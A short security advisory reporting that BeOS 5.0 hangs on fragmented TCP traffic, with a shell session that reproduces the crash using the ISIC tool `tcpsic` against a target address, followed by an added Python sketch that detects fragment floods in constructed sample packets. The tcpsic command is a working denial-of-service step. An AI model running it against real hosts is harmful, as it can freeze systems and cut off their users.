COMMAND

    TCP/IP

SYSTEMS AFFECTED

    Be/OS 5.0

PROBLEM

    visi0n found the following (AUX Security Advisory).  The Be/OS
    operating system version 5.0 has a vulnerability in its handling
    of TCP fragmentation that can lock up the entire system, requiring
    a cold reset to recover.  The bug can be reproduced using
    ISIC-0.05.

        [root@localhost isic-0.05]# ping 10.0.1.46
        PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.
        64 bytes from 10.0.1.46: icmp_seq=0 ttl=255 time=7.3 ms
        64 bytes from 10.0.1.46: icmp_seq=1 ttl=255 time=1.8 ms
        
        --- 10.0.1.46 ping statistics ---
        2 packets transmitted, 2 packets received, 0% packet loss
        round-trip min/avg/max = 1.8/4.5/7.3 ms
        [root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0 -I0 -T0 -u0 -t0
        Compiled against Libnet 1.0.1b
        Installing Signal Handlers.
        Seeding with 31337
        No Maximum traffic limiter
        Using random source ports.
        Using random destination ports.
        Bad IP Version  = 0%            IP Opts Pcnt    = 0%
        Frag'd Pcnt     = 100%          Urg Pcnt        = 0%
        Bad TCP Cksm    = 0%            TCP Opts Pcnt   = 0%
        
         1000 @ 1802.8 pkts/sec and 1174.6 k/s
         2000 @ 1636.8 pkts/sec and 1105.5 k/s
         3000 @ 2110.2 pkts/sec and 1396.4 k/s
         4000 @ 1689.1 pkts/sec and 1105.4 k/s
        Caught signal 2
        Used random seed 31337
        Wrote 5002 packets in 2.74s @ 1824.48 pkts/s
        [root@localhost isic-0.05]# ping 10.0.1.46
        PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.
        
        --- 10.0.1.46 ping statistics ---
        11 packets transmitted, 0 packets received, 100% packet loss
        [root@localhost isic-0.05]#

SOLUTION

    No fix yet.
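
    The tcpsic run above sends TCP packets that are 100% fragmented, so a
    sensor in front of an unpatched host can flag that pattern.  The sketch
    below is an added example, not part of the advisory or of ISIC; the
    thresholds, function names and the 10.0.3.9 address are assumptions, and
    the packets are constructed sample input.

```python
import socket
import struct
from collections import Counter

IP_MF = 0x2000       # "more fragments" flag
IP_OFFMASK = 0x1FFF  # fragment offset, in 8-byte units

def parse_ipv4(pkt):
    """Return (src, dst, proto, is_fragment), or None if not a sane IPv4 header."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or (pkt[0] & 0x0F) < 5:
        return None
    frag_field, = struct.unpack("!H", pkt[6:8])
    is_frag = bool(frag_field & IP_MF) or (frag_field & IP_OFFMASK) != 0
    return (socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]),
            pkt[9], is_frag)

def fragment_flood_targets(packets, min_packets=100, min_ratio=0.9):
    """Destinations whose TCP traffic in one capture window is mostly fragments.

    min_packets and min_ratio are assumed thresholds; tune them per network.
    """
    total, frags = Counter(), Counter()
    for pkt in packets:
        hdr = parse_ipv4(pkt)
        if hdr is None or hdr[2] != socket.IPPROTO_TCP:
            continue
        total[hdr[1]] += 1
        frags[hdr[1]] += hdr[3]  # True counts as 1
    return {dst: frags[dst] / n for dst, n in total.items()
            if n >= min_packets and frags[dst] / n >= min_ratio}

def build_header(src, dst, frag_field, proto=socket.IPPROTO_TCP):
    """Constructed sample input: a bare 20-byte IPv4 header (checksum left 0)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, frag_field, 255, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))

def sample_window():
    """Constructed capture window reusing the addresses from the session above."""
    flood = [build_header("1.1.1.1", "10.0.1.46", IP_MF | (i % 8)) for i in range(500)]
    normal = [build_header("10.0.3.5", "10.0.3.9", 0) for _ in range(300)]
    normal += [build_header("10.0.3.5", "10.0.3.9", IP_MF) for _ in range(3)]
    return flood + normal

if __name__ == "__main__":
    for dst, ratio in fragment_flood_targets(sample_window()).items():
        print(f"{dst}: {ratio:.0%} of TCP packets are fragments")
```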